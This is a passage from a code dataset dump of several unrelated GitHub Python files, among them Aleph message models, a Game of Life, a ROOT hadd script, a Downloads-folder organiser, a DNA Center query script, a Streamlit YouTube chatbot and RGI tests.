description=\"MongoDB metadata\",\n exclude=True,\n )\n chain: Chain = Field(description=\"Blockchain used for this message\")\n\n sender: str = Field(description=\"Address of the sender\")\n type: MessageType = Field(description=\"Type of message (POST, AGGREGATE or STORE)\")\n channel: Optional[str] = Field(\n default=None,\n description=\"Channel of the message, one application ideally has one channel\",\n )\n confirmations: Optional[List[MessageConfirmation]] = Field(\n default=None, description=\"Blockchain confirmations of the message\"\n )\n confirmed: Optional[bool] = Field(\n default=None,\n description=\"Indicates that the message has been confirmed on a blockchain\",\n )\n signature: Optional[str] = Field(\n description=\"Cryptographic signature of the message by the sender\"\n )\n size: Optional[int] = Field(\n default=None, description=\"Size of the content\"\n ) # Almost always present\n time: float = Field(description=\"Unix timestamp when the message was published\")\n item_type: ItemType = Field(description=\"Storage method used for the content\")\n item_content: Optional[str] = Field(\n default=None,\n description=\"JSON serialization of the message when 'item_type' is 'inline'\",\n )\n hash_type: Optional[HashType] = Field(\n default=None, description=\"Hashing algorithm used to compute 'item_hash'\"\n )\n item_hash: ItemHash = Field(description=\"Hash of the content (sha256 by default)\")\n content: BaseContent = Field(description=\"Content of the message, ready to be used\")\n\n forgotten_by: Optional[List[str]]\n\n @validator(\"item_content\")\n def check_item_content(cls, v: Optional[str], values):\n item_type = values[\"item_type\"]\n if v is None:\n return None\n elif item_type == ItemType.inline:\n try:\n json.loads(v)\n except JSONDecodeError:\n raise ValueError(\n \"Field 'item_content' does not appear to be valid JSON\"\n )\n else:\n raise ValueError(\n f\"Field 'item_content' cannot be defined when 'item_type' == '{item_type}'\"\n )\n return v\n\n @validator(\"item_hash\")\n def check_item_hash(cls, v, values):\n item_type = values[\"item_type\"]\n if item_type == ItemType.inline:\n item_content: str = values[\"item_content\"]\n\n # Double check that the hash function is supported\n hash_type = values[\"hash_type\"] or HashType.sha256\n assert hash_type.value == HashType.sha256\n\n computed_hash: str = sha256(item_content.encode()).hexdigest()\n if v != computed_hash:\n raise ValueError(\n f\"'item_hash' do not match 'sha256(item_content)'\"\n f\", expecting {computed_hash}\"\n )\n elif item_type == ItemType.ipfs:\n # TODO: CHeck that the hash looks like an IPFS multihash\n pass\n else:\n assert item_type == ItemType.storage\n return v\n\n @validator(\"confirmed\")\n def check_confirmed(cls, v, values):\n confirmations = values[\"confirmations\"]\n if v is True and not bool(confirmations):\n raise ValueError(\"Message cannot be 'confirmed' without 'confirmations'\")\n return v\n\n class Config:\n extra = Extra.forbid\n exclude = {\"id_\", \"_id\"}\n\n\nclass PostMessage(BaseMessage):\n \"\"\"Unique data posts (unique data points, events, ...)\"\"\"\n\n type: Literal[MessageType.post]\n content: PostContent\n\n\nclass AggregateMessage(BaseMessage):\n \"\"\"A key-value storage specific to an address\"\"\"\n\n type: Literal[MessageType.aggregate]\n content: AggregateContent\n\n\nclass StoreMessage(BaseMessage):\n type: Literal[MessageType.store]\n content: StoreContent\n\n\nclass ForgetMessage(BaseMessage):\n type: Literal[MessageType.forget]\n content: ForgetContent\n\n @validator(\"forgotten_by\")\n def cannot_be_forgotten(cls, v: Optional[List[str]], values) -> Optional[List[str]]:\n assert values\n if v:\n raise ValueError(\"This type of message may not be forgotten\")\n return v\n\n\nclass ProgramMessage(BaseMessage):\n type: Literal[MessageType.program]\n content: ProgramContent\n\n @validator(\"content\")\n def check_content(cls, v, values):\n item_type = values[\"item_type\"]\n if item_type == ItemType.inline:\n item_content = json.loads(values[\"item_content\"])\n if v.dict(exclude_none=True) != item_content:\n # Print differences\n vdict = v.dict(exclude_none=True)\n for key, value in item_content.items():\n if vdict[key] != value:\n print(f\"{key}: {vdict[key]} != {value}\")\n raise ValueError(\"Content and item_content differ\")\n return v\n\n\nclass InstanceMessage(BaseMessage):\n type: Literal[MessageType.instance]\n content: InstanceContent\n\n\nAlephMessage: TypeAlias = Union[\n PostMessage,\n AggregateMessage,\n StoreMessage,\n ProgramMessage,\n InstanceMessage,\n ForgetMessage,\n]\n\nAlephMessageType: TypeAlias = Union[\n Type[PostMessage],\n Type[AggregateMessage],\n Type[StoreMessage],\n Type[ProgramMessage],\n Type[InstanceMessage],\n Type[ForgetMessage],\n]\n\nmessage_classes: List[AlephMessageType] = [\n PostMessage,\n AggregateMessage,\n StoreMessage,\n ProgramMessage,\n InstanceMessage,\n ForgetMessage,\n]\n\nExecutableContent: TypeAlias = Union[InstanceContent, ProgramContent]\nExecutableMessage: TypeAlias = Union[InstanceMessage, ProgramMessage]\n\n\ndef parse_message(message_dict: Dict) -> AlephMessage:\n \"\"\"Returns the message class corresponding to the type of message.\"\"\"\n for message_class in message_classes:\n message_type: MessageType = MessageType(\n message_class.__annotations__[\"type\"].__args__[0]\n )\n if message_dict[\"type\"] == message_type:\n return message_class.parse_obj(message_dict)\n else:\n raise ValueError(f\"Unknown message type {message_dict['type']}\")\n\n\ndef add_item_content_and_hash(message_dict: Dict, inplace: bool = False):\n if not inplace:\n message_dict = copy(message_dict)\n\n message_dict[\"item_content\"] = json.dumps(\n message_dict[\"content\"], separators=(\",\", \":\")\n )\n message_dict[\"item_hash\"] = sha256(\n message_dict[\"item_content\"].encode()\n ).hexdigest()\n return message_dict\n\n\ndef create_new_message(\n message_dict: Dict,\n factory: Optional[AlephMessageType] = None,\n) -> AlephMessage:\n \"\"\"Create a new message from a dict.\n Computes the 'item_content' and 'item_hash' fields.\n \"\"\"\n message_content = add_item_content_and_hash(message_dict)\n if factory:\n return factory.parse_obj(message_content)\n else:\n return parse_message(message_content)\n\n\ndef create_message_from_json(\n json_data: str,\n factory: Optional[AlephMessageType] = None,\n) -> AlephMessage:\n \"\"\"Create a new message from a JSON encoded string.\n Computes the 'item_content' and 'item_hash' fields.\n \"\"\"\n message_dict = json.loads(json_data)\n message_content = add_item_content_and_hash(message_dict, inplace=True)\n if factory:\n return factory.parse_obj(message_content)\n else:\n return parse_message(message_content)\n\n\ndef create_message_from_file(\n filepath: Path, factory: Optional[AlephMessageType] = None, decoder=json\n) -> AlephMessage:\n \"\"\"Create a new message from an encoded file.\n Expects json by default, but allows other decoders with a method `.load()`\n that takes a file descriptor.\n Computes the 'item_content' and 'item_hash' fields.\n \"\"\"\n with open(filepath) as fd:\n message_dict = decoder.load(fd)\n message_content = add_item_content_and_hash(message_dict, inplace=True)\n if factory:\n return factory.parse_obj(message_content)\n else:\n return parse_message(message_content)\n\n\nclass MessagesResponse(BaseModel):\n \"\"\"Response from an Aleph node API.\"\"\"\n\n messages: List[AlephMessage]\n pagination_page: int\n pagination_total: int\n pagination_per_page: int\n pagination_item: str\n\n class Config:\n extra = Extra.forbid\n","repo_name":"aleph-im/aleph-message","sub_path":"aleph_message/models/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":12693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"71815877530","text":"n = int(input())\na = [int(x) for x in input().split()]\nq = int(input())\na.sort()\n \nfor Q in range(q):\n val = int(input())\n lb, ub = 0, n - 1\n ans = 0\n \n while(lb <= ub):\n mid = (lb + ub) // 2\n \n if a[mid] <= val:\n lb = mid + 1\n ans = mid + 1\n else:\n ub = mid - 1\n print(ans)\n","repo_name":"Ishita-Tiwari/competitive-programming","sub_path":"Codeforces/706B.py","file_name":"706B.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"72087025371","text":"from flask import Flask\n# import model\n\napp = Flask(__name__)\n\n@app.route(\"/\")\ndef hello_world(data):\n # get data from request\n cleanData = data\n\n # pass data to model\n\n # get model prediction\n\n # pass prediction back in response\n return \"

Hello, World!

\"","repo_name":"flippedcoder/mlops-demo","sub_path":"new_project/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"32"} +{"seq_id":"12635702807","text":"import tkinter as tk\r\nimport random\r\n\r\n# settings\r\n\r\nCANVAS_SIZE = 750\r\nRESOLUTION = 75\r\nINTERVAL = 50\r\nCELL_SIZE = CANVAS_SIZE / RESOLUTION\r\n\r\nBG = \"black\"\r\nFG = \"white\"\r\n\r\n# global variables\r\n\r\nroot = tk.Tk()\r\ncanvas = tk.Canvas(root, width=CANVAS_SIZE, height=CANVAS_SIZE, bg=BG)\r\ncanvas.pack()\r\n\r\ndef get_cell_val(x : int, y : int, grid : list) -> bool:\r\n return (grid[y] >> x) & 0b1\r\n\r\ndef set_cell_val(x : int, y : int, val : bool, grid : list):\r\n bit = 0b1 << x\r\n\r\n if val:\r\n grid[y] |= bit\r\n else:\r\n grid[y] &= ~bit\r\n\r\ndef in_bounds(x : int, y : int) -> bool:\r\n num_in_bounds = lambda n : n >= 0 and n < RESOLUTION\r\n return num_in_bounds(x) and num_in_bounds(y)\r\n\r\ndef get_neighbors(x : int, y : int, grid : list) -> int:\r\n n = 0\r\n\r\n # cycle through all neighboring offsets\r\n for dy in range(-1, 2):\r\n for dx in range(-1, 2):\r\n # ignore home cell\r\n if dx == 0 and dy == 0:\r\n continue\r\n \r\n # get actual coordinates of neighbor\r\n nx = x + dx\r\n ny = y + dy\r\n\r\n if not in_bounds(nx, ny):\r\n continue\r\n\r\n if get_cell_val(nx, ny, grid):\r\n n += 1\r\n\r\n return n\r\n\r\ndef draw_cell(x : int, y : int):\r\n canvas_x = x * CELL_SIZE\r\n canvas_y = y * CELL_SIZE\r\n canvas.create_rectangle(canvas_x, canvas_y, canvas_x + CELL_SIZE, canvas_y + CELL_SIZE, fill=FG, outline=\"\")\r\n\r\ndef update(old_grid : list):\r\n canvas.delete(\"all\")\r\n grid = old_grid.copy()\r\n\r\n for y in range(RESOLUTION):\r\n for x in range(RESOLUTION):\r\n n = get_neighbors(x, y, old_grid)\r\n\r\n # apply game of life rules\r\n if n < 2 or n > 3:\r\n set_cell_val(x, y, False, grid)\r\n elif n == 3:\r\n set_cell_val(x, y, True, grid)\r\n # else, cells are the same as previous generation which is accounted for in copying the old grid to the new grid\r\n \r\n # only draw cell if it's alive, for performance\r\n if get_cell_val(x, y, grid):\r\n draw_cell(x, y)\r\n\r\n root.after(INTERVAL, update, grid)\r\n\r\n# program start\r\ngrid = []\r\nmax_val = 2**RESOLUTION - 1\r\n\r\n# randomize initial grid state\r\nfor y in range(RESOLUTION):\r\n # since rows are stored in integers, we can randomzie rows by assigning it a random int\r\n grid.append(random.randint(0, max_val))\r\n\r\nupdate(grid)\r\nroot.mainloop()\r\n","repo_name":"user-simon/Game-of-Life-Python","sub_path":"src.py","file_name":"src.py","file_ext":"py","file_size_in_byte":2474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"4826530589","text":"#!/usr/bin/env python3\n## vi: tabstop=4 shiftwidth=4 softtabstop=4 expandtab\nfrom pyscf import gto, scf\n\nimport adcc\n\n# Run SCF in pyscf\nmol = gto.M(\n atom='S -0.38539679062 0 -0.27282082253;'\n 'H -0.0074283962687 0 2.2149138578;'\n 'H 2.0860198029 0 -0.74589639249',\n basis='cc-pvtz',\n unit=\"Bohr\"\n)\nscfres = scf.RHF(mol)\nscfres.conv_tol = 1e-13\nscfres.kernel()\n\nprint(adcc.banner())\n\n# Run an adc2x calculation:\nsinglets = adcc.cvs_adc2x(scfres, core_orbitals=1, frozen_core=1, n_singlets=3)\ntriplets = adcc.cvs_adc2x(singlets.matrix, n_triplets=3)\n\nprint(singlets.describe())\nprint()\nprint(triplets.describe())\n","repo_name":"adc-connect/adcc","sub_path":"examples/sulfur_hydride/pyscf_ccpvtz_fc_cvs_adc2x.py","file_name":"pyscf_ccpvtz_fc_cvs_adc2x.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"32"} +{"seq_id":"36504298590","text":"import os, sys, time, subprocess, math\nfrom argparse import ArgumentParser\nimport config\n\nstart_time = time.time()\n\nparser = ArgumentParser()\nparser.add_argument( \"-y\", \"--year\", default = \"17\", help = \"Options: [16,17,18]\" )\nparser.add_argument( \"-t\", \"--test\", action = \"store_true\" )\nparser.add_argument( \"-s\", \"--systematic\", action = \"store_true\" )\nparser.add_argument( \"-f\", \"--filesPerHadd\", default = \"900\" )\nparser.add_argument( \"-l\", \"--location\", default = \"LPC\", help = \"Options: [ LPC, BRUX ]\" )\nargs = parser.parse_args()\n\nfrom ROOT import *\n\nexecfile( \"../EOSSafeUtils.py\" )\n\nshifts = [ \"nominal\" ] if not args.systematic else [ \"nominal\", \"JECup\", \"JECdown\", \"JERup\", \"JERdown\" ]\n\nstep1Dir = {\n shift: os.path.join( config.step1Dir[ args.year ][ args.location ], shift ) for shift in shifts\n}\n\nhaddDir = {\n shift: os.path.join( config.haddDir[ args.year ][ args.location ], shift ) for shift in shifts \n}\n\nfor shift in shifts:\n os.system( \"eos root://cmseos.fnal.gov/ mkdir -p {}\".format( haddDir[ shift ] ) )\n\nif args.location not in [ \"LPC\", \"BRUX\" ]: \n print( \">> [] is not a valid location option. Using: LPC\" )\n location = \"LPC\"\nelse: location = args.location\n\nsamples = config.samples[ \"20\" + args.year ][ \"TEST\" ] if args.test else config.samples[ \"20\" + args.year ][ location ]\n\nfor shift in shifts:\n for sample in samples:\n if shift != \"nominal\":\n if \"Single\" in sample or \"EGamma\" in sample or \"up\" in sample.lower() or \"down\" in sample.lower(): continue\n outList = []\n if \"TTToSemiLeptonic\" in sample and \"up\" not in sample.lower() and \"down\" not in sample.lower():\n for HT_key in [ \"HT0Njet0\", \"HT500Njet9\" ]:\n for fs_key in [ \"ttbb\", \"tt2b\", \"tt1b\", \"ttcc\", \"ttjj\" ]:\n outList.append( \"{}_{}\".format( HT_key, fs_key ) )\n elif \"TTTo\" in sample:\n outList = [ \"ttbb\", \"tt2b\", \"tt1b\", \"ttcc\", \"ttjj\" ]\n else:\n outList = [ \"none\" ]\n\n for outLabel in outList:\n outSample = sample if outLabel == \"none\" else \"{}_{}\".format( sample, outLabel )\n \n step1Files = EOSlist_root_files( os.path.join( step1Dir[ shift ], outSample ) )\n \n print( \">> Hadd'ing {}: {} files\".format( outSample, len( step1Files ) ) )\n \n filesPerHadd = int( args.filesPerHadd )\n if \"TTToSemiLeptonic\" in outSample and outLabel == \"HT0Njet0_ttjj\": filesPerHadd = 45\n elif \"WJetsToLNu_HT-1200To2500\" in outSample: filesPerHadd = 120\n elif \"WJetsToLNu_HT-2500ToInf\" in outSample: filesPerHadd = 13\n if \"down\" in outSample.lower() or \"up\" in outSample.lower(): filesPerHadd = 900\n\n singleFile = \" root://cmseos.fnal.gov/{}/{}/{}\".format( step1Dir[shift], outSample, step1Files[-1] )\n multipleFiles = filesPerHadd * singleFile\n lengthCheck = len( \"hadd -f root://cmseos.fnal.gov/{}/{}_hadd.root {}\".format( haddDir[shift], outSample, multipleFiles ) )\n if lengthCheck > 126000:\n overflow = lengthCheck - 126000\n nRemove = math.ceil( overflow / len( singleFile ) )\n filesPerHadd = int( filesPerHadd - nRemove )\n print( \"[WARN] Length estimate reduced from {} by {} via removing {} files for {} hadd'd files\".format( lengthCheck, overflow, nRemove, filesPerHadd ) )\n\n haddCommand = \"\"\n if len( step1Files ) < filesPerHadd:\n haddCommand = \"hadd -f root://cmseos.fnal.gov/{}/{}_hadd.root \".format( haddDir[shift], outSample )\n for step1 in step1Files: haddCommand += \" root://cmseos.fnal.gov/{}/{}/{}\".format( step1Dir[shift], outSample, step1 )\n print( \">> Length of {} hadd command: {}\".format( outSample, len( haddCommand ) ) )\n subprocess.call( haddCommand, shell = True )\n\n if bool( EOSisfile( \"{}/{}_hadd.root\".format( haddDir[shift], outSample ) ) ) != True:\n print( haddCommand )\n else:\n for i in range( int( math.ceil( len( step1Files ) / float( filesPerHadd ) ) ) ):\n haddCommand = \"hadd -f root://cmseos.fnal.gov/{}/{}_{}_hadd.root \".format( haddDir[ shift ], outSample, i + 1 )\n \n begin = i * filesPerHadd\n end = ( i + 1 ) * filesPerHadd\n if end > len( step1Files ): end = len( step1Files )\n for j in range( begin, end ):\n haddCommand += \" root://cmseos.fnal.gov/{}/{}/{}\".format( step1Dir[ shift ], outSample, step1Files[j] )\n subprocess.call( haddCommand, shell = True )\n \n if not bool( EOSisfile( \"{}/{}_{}_hadd.root\".format( haddDir[ shift ], outSample, i + 1 ) ) ): print( haddCommand )\n\nprint( \"[DONE] Finished hadd'ing samples in {:.2f} minutes.\".format( round( time.time() - start_time, 2 ) / 60 ) )\n","repo_name":"daniel-sunyou-li/TTT-singleLep","sub_path":"LJMet-Slimmer-3tops/step1/run_hadd.py","file_name":"run_hadd.py","file_ext":"py","file_size_in_byte":4603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"5040027637","text":"import unittest\r\nimport filecount\r\nimport glob\r\nimport time\r\nimport os\r\n\r\nPATHSTEM = \"v:\\\\workspace\\\\FileHandling\\\\src\\\\testfc\\\\\"\r\n#PATHSTEM = \".\"\r\n\r\nclass TestFilecount(unittest.TestCase):\r\n \r\n def setUp(self):\r\n self.path = PATHSTEM\r\n self.files = [\"batman.txt\", \"chalupa.txt\", \"spam.out\", \"eggs.bat\"]\r\n self.dir = \"foo.bar\"\r\n self.expected_count = {'.txt':2, '.bat': 1, '.out': 1}\r\n os.mkdir(self.path)\r\n for fn in self.files:\r\n f = open(self.path+fn, \"w\")\r\n f.close()\r\n time.sleep(1)\r\n os.mkdir(self.path+self.dir)\r\n \r\n def test_count_expected(self):\r\n \"\"\"new test...see if the file counts match what should be expected from out list\"\"\"\r\n fc = filecount.count_by_ext(path=self.path)\r\n self.assertEqual(fc,self.expected_count,msg=\"The counts returned by function do not match expected\")\r\n \r\n def tearDown(self):\r\n os.rmdir(self.path+self.dir)\r\n for fn in self.files:\r\n os.unlink(self.path+fn)\r\n os.rmdir(self.path)\r\n\r\nif __name__ == \"__main__\":\r\n unittest.main()\r\n \r\n ","repo_name":"T300M256/Python_Courses","sub_path":"python2/FileHandling_Homework/src/test_filecount.py","file_name":"test_filecount.py","file_ext":"py","file_size_in_byte":1134,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"3083784410","text":"from Bio.Seq import Seq\nfrom Bio import SeqIO\nfrom Bio.SeqRecord import SeqRecord\n\n# abrindo, lendo e identificando os itens do arquivo fasta:\nmultifasta = SeqIO.parse(open(\"../Amostra/sequencias.fasta\", 'r'), \"fasta\")\n# contador para os arquivos:\nnum = 0\n# leitura das linhas:\nfor line in multifasta:\n num = num + 1\n# o SeqRecord precisa ser gerado nessa ordem (id primeiro e seq depois dá bug)\n record = SeqRecord(line.seq, line.id)\n# escrevendo o fasta inserindo a variável num no nome do arquivo\n SeqIO.write(record, 'Sequencia_%d.fasta' % num,\"fasta\")\n # cria apenas 2 arquivos .fasta. Quando chega ao limite o programa é interrompido\n if num == 2:\n break","repo_name":"beatrizbrandi/progbiociencia","sub_path":"TAC3/Dados/questao2.py","file_name":"questao2.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"69871604892","text":"#!/usr/bin/python3\n\nimport os\n\n\n### making necessary folders to store respective files.\n\nusername = os.getlogin()\n#print(username)\nhome_dir = f'/home/{username}'\nsourceDir = f'{home_dir}/Downloads/'\nfolders = {\n\t'document': f'{home_dir}/Documents/Downloaded_Documents/', \n\t'picture': f'{home_dir}/Pictures/Downloaded_Pictures/',\n\t'music': f'{home_dir}/Music/Downloaded_Music/',\n\t'video': f'{home_dir}/Videos/Downloaded_Videos/',\n}\n\nfor i in folders.values():\n\tif not os.path.exists(i):\n\t\tos.system(f'mkdir {i}')\n\nfiles = [f\"{sourceDir}{f}\" for f in os.listdir(f'{home_dir}/Downloads/')]\n#print(files)\n\nprint(\"\\n\\033[31m Moving Files ... Don't exit !!! \")\nprint('\\n\\033[39m')\n#print(files)\nfor f in files:\n\n\t# Kickout Documents\n\tif f.endswith(('.pdf', '.doc', '.docx', '.xls', '.odt', '.ppt')):\n\t\tprint(f, end=\" ... \")\n\t\tos.system(f\"mv \\\"{f}\\\" {folders['document']}\")\n\t\tprint(\"\\033[32m Done\")\n\t\tprint('\\n\\033[39m')\n\n\t# kickout Pictures\n\tif f.endswith(('.jpg', '.JPG', '.png', '.PNG', '.jpeg', '.JPEG', '.gif', '.GIF', '.svg', '.SVG')):\n\t\tprint(f, end=\" ...\")\n\t\tos.system(f\"mv \\\"{f}\\\" {folders['picture']}\")\n\t\tprint(\"\\033[32m Done\")\n\t\tprint('\\n\\033[39m')\n\t\n\t# kickout Music\n\tif f.endswith(('.mp3', '.aac', '.opus', '.ogg')):\n\t\tprint(f, end=\" ...\")\n\t\tos.system(f\"mv \\\"{f}\\\" {folders['music']}\")\n\t\tprint(\"\\033[32m Done\")\n\t\tprint('\\n\\033[39m')\n\n\t# kickout videos\n\tif f.endswith(('.mp4', '.webm', '.mkv', '.avi', '.flv', '.mov')):\n\t\tprint(f, end=\" ...\")\n\t\tos.system(f\"mv \\\"{f}\\\" {folders['video']}\")\n\t\tprint(\"\\033[32m Done\")\n\t\tprint('\\n\\033[39m')\n\nprint('\\033[93m All moving Done !!!')\n","repo_name":"abijoy/Kickout","sub_path":"kickout.py","file_name":"kickout.py","file_ext":"py","file_size_in_byte":1580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"21399082497","text":"import requests\nimport socket\nimport json\nfrom requests.auth import HTTPBasicAuth\nfrom get_token import get_token\nfrom get_serial_no import get_serial_no\n\ndef tcp_socket(event, context):\n n = 0\n \n for device in get_serial_no(event, context):\n search_serial = {\"serialNumber\": \"%s\" % get_serial_no(event, context)[n]}\n n = n+1\n \n def get_device_serial():\n requests.packages.urllib3.disable_warnings()\n url = \"https://10.10.1.2/api/v1/network-device\"\n hdr = {'x-auth-token': get_token(event, context), 'content-type': 'application/json'}\n resp = requests.get(url, headers=hdr, params=search_serial, verify=False)\n device_serial = resp.json()\n return device_serial\n \n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n s.connect(('10.11.2.7', 7001))\n s.send(str(json.dumps(get_device_serial())).encode('utf-8'))\n s.close()","repo_name":"leon0854/DNA-and-AWS-integration","sub_path":"DNA-Demo_DNAC_Get-Device-List/dna_demo.py","file_name":"dna_demo.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"4294219934","text":"\"\"\"A Simple chatbot that uses the LangChain and Streamlit to answer questions Youtube videos\"\"\"\nimport os\nfrom types import SimpleNamespace\n\nimport streamlit as st\nfrom streamlit_chat import message\nfrom streamlit_extras.colored_header import colored_header\nfrom streamlit_extras.add_vertical_space import add_vertical_space\n\nimport wandb\nfrom chains import load_chain, load_vector_store\nfrom config import default_config\nfrom ingest import main,get_parser\n\nfrom dotenv import find_dotenv, load_dotenv\n\nload_dotenv(find_dotenv())\n\n# Initialize a new W&B run to track this job\nrun = wandb.init(project=\"ytchat\", job_type=\"production\", entity= \"TEAM\",reinit=True)\nopenai_key = os.getenv(\"OPENAI_API_KEY\")\n\nst.title('🎈 AI YOUTUBE CHAT')\n\nst.write('USE THE SIDE BAR ON TOP LEFT TO INPUT THE YOUTUBE VIDEO YOU WANT TO CHAT WITH')\n\n\n## generated stores AI generated responses\nif 'generated' not in st.session_state:\n st.session_state['generated'] = [\"I am AI YOUTUBE CHAT, How may I help you?\"]\n## past stores User's questions\nif 'past' not in st.session_state:\n st.session_state['past'] = ['Hi!']\n\n# Layout of input/response containers\ninput_container = st.container()\ncolored_header(label='', description='', color_name='red-30')\nresponse_container = st.container()\n\n# User input\n## Function for taking user provided prompt as input\ndef get_text():\n input_text = st.text_input(\"You: \", \"\", key=\"input\")\n return input_text\n\ndef youtube_chat():\n # Sidebar contents\n with st.sidebar:\n st.title('💬 Chat with a youtube video')\n st.header('ENTER YOUTUBE VIDEO YOU WANT TO CHAT WITH')\n video_url = st.text_input('Enter VIDEO LINK and click Process:')\n\n if video_url[0:24]=='https://www.youtube.com/':\n video_url=video_url\n else:\n video_url = \"https://www.youtube.com/watch?v=\" + video_url.split('youtu.be/')[-1]\n \n if st.button(\"Process\"):\n try:\n with st.spinner(\"Processing\"):\n main(video_url)\n except Exception as e:\n st.image('YouTube-Logo.wine.png')\n\n st.markdown('''\n ## About\n This app is an LLM-powered chatbot built using:\n - [Streamlit](https://streamlit.io/)\n - [Langchain](https://langchain-langchain.vercel.app/docs/get_started)\n ''')\n st.write('Made with ❤️ by [Akash Rakshit](https://www.linkedin.com/in/akash-rakshit-020761175/)')\n\n ## Applying the user input box\n with input_container:\n user_input = get_text()\n if not user_input:\n st.warning('Please begin conversation by entering your video related Query')\n ## Conditional display of AI generated responses as a function of user provided prompts\n with response_container:\n if user_input:\n user_input = user_input.lower()\n \n vector_store = load_vector_store(\n wandb_run=run, openai_api_key=openai_key\n )\n chain,docs_pages = load_chain(question=user_input,db = vector_store,\n wandb_run=run, vector_store=vector_store, openai_api_key=openai_key\n )\n \n response = chain.run(question=user_input, docs=docs_pages)\n response = response.replace(\"\\n\", \"\")\n st.session_state.past.append(user_input)\n st.session_state.generated.append(response)\n \n if st.session_state['generated']:\n for i in range(len(st.session_state['generated'])):\n message(st.session_state['past'][i], is_user=True, key=str(i) + '_user')\n message(st.session_state[\"generated\"][i], key=str(i))\n\n if st.button(\"New Video\"):\n run.finish()\n \n\n\nif __name__ == '__main__':\n youtube_chat()","repo_name":"AAKAAASSHHH24/Youtube_Chat","sub_path":"src/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"75116915610","text":"import pytest\nimport os, json\nfrom app.MainBase import MainBase\n\ninputs = \"inputs/\"\noutputs = \"outputs/\"\nalignment_tool = \"diamond\"\nworking_directory = os.getcwd()\n\n# Run all tests with\n# pytest test_1.py -v -rxs --color=auto --durations=0\n# or\n# pytest test_1.py -v -rxs --color=auto --durations=0 -k \"protein\"\n\n@pytest.fixture\ndef rgi():\n\treturn MainBase(api=True)\n\"\"\"\ndef import_from_ncbi(accession, seq_type=\"nucleotide\"):\n\tfrom Bio import Entrez\n\timport time\n\timport json\n\tEntrez.email =\"johnQ@gmail.com\"\n\ttry:\n\t\thandle = Entrez.efetch(db=seq_type, id=accession, retmode=\"xml\" , rettype = \"fasta\")\n\texcept Exception as e:\n\t\ttime.sleep(20)\n\t\thandle = Entrez.efetch(db=seq_type, id=accession, retmode=\"xml\" , rettype = \"fasta\")\n\trecords = Entrez.read(handle)\n\n\treturn records[0][\"TSeq_sequence\"]\n\"\"\"\n\ndef validate_results(filepath,perc_identity=0, ARO_name='', type_match=''):\n\tpi = \"\"\n\tname = \"\"\n\ttm = \"\"\n\tfilename = os.path.basename(filepath)\n\tf = os.path.join(\"{}\".format(filepath))\n\tif os.path.isfile(f):\n\t\twith open(f) as json_file:\n\t\t\tjson_data = json.load(json_file)\n\t\t\tfor i in json_data:\n\t\t\t\tif i not in [\"_metadata\"]:\n\t\t\t\t\tfor j in json_data[i]:\n\t\t\t\t\t\tfor k in json_data[i][j]:\n\t\t\t\t\t\t\tpi = json_data[str(i)][str(j)][\"perc_identity\"]\n\t\t\t\t\t\t\tname = json_data[str(i)][str(j)][\"ARO_name\"]\n\t\t\t\t\t\t\ttm = json_data[str(i)][str(j)][\"type_match\"]\n\t\t\t\t\t\tif pi == perc_identity and name == ARO_name and tm == type_match:\n\t\t\t\t\t\t\t#print(pi, name, tm)\n\t\t\t\t\t\t\treturn True\n\t\t\treturn False\n\telse:\n\t\tprint(\"missing file: {}\".format(f))\n\t\treturn False\n\ndef run_rgi(rgi, input_type, input_sequence, output_file):\n\tparser = rgi.main_args()\n\trgi.main_run(parser.parse_args([\n\t\t'--input_type', input_type,\n\t\t'--input_sequence', input_sequence,\n\t\t'--output_file', output_file,\n\t\t'--alignment_tool', alignment_tool,\n\t\t'--clean',\n\t\t'--include_loose',\n\t\t'--include_nudge',\n\t\t'--low_quality',\n\t\t'--debug'\n ]))\n\n# def run_rgi_with_nudge(rgi, input_type, input_sequence, output_file):\n# \tparser = rgi.main_args()\n# \trgi.main_run(parser.parse_args([\n# \t\t'--input_type', input_type,\n# \t\t'--input_sequence', input_sequence,\n# \t\t'--output_file', output_file,\n# \t\t'--alignment_tool', alignment_tool,\n# \t\t'--clean',\n# \t\t'--include_loose',\n# \t\t'--include_nudge',\n# \t\t'--low_quality',\n# \t\t'--debug'\n# ]))\n\ndef test_rgi_protein_sequence(rgi):\n\n\tfilename = \"protein.fasta\"\n\toutput_file = os.path.join(working_directory,outputs,\"{}.json\".format(filename))\n\trun_rgi(rgi, 'protein', os.path.join(working_directory,inputs,filename), output_file)\n\n\tassert validate_results(output_file, 100, 'NDM-1', 'Perfect') == True\n\ndef test_rgi_nucleotide_sequence(rgi):\n\n\tfilename = \"NC_020818.1.fasta\"\n\toutput_file = os.path.join(working_directory,outputs,\"{}.json\".format(filename))\n\trun_rgi(rgi, 'contig', os.path.join(working_directory,inputs,filename), output_file)\n\n\tassert validate_results(output_file, 100, 'NDM-1', 'Perfect') == True\n\tassert validate_results(output_file, 98.46, \"APH(3')-VIa\", 'Strict') == True\n\tassert validate_results(output_file, 100, 'mphE', 'Perfect') == True\n\tassert validate_results(output_file, 100, 'msrE', 'Perfect') == True\n\ndef test_rgi_homolog_model(rgi):\n\n\tfilename = \"homolog.fasta\"\n\toutput_file = 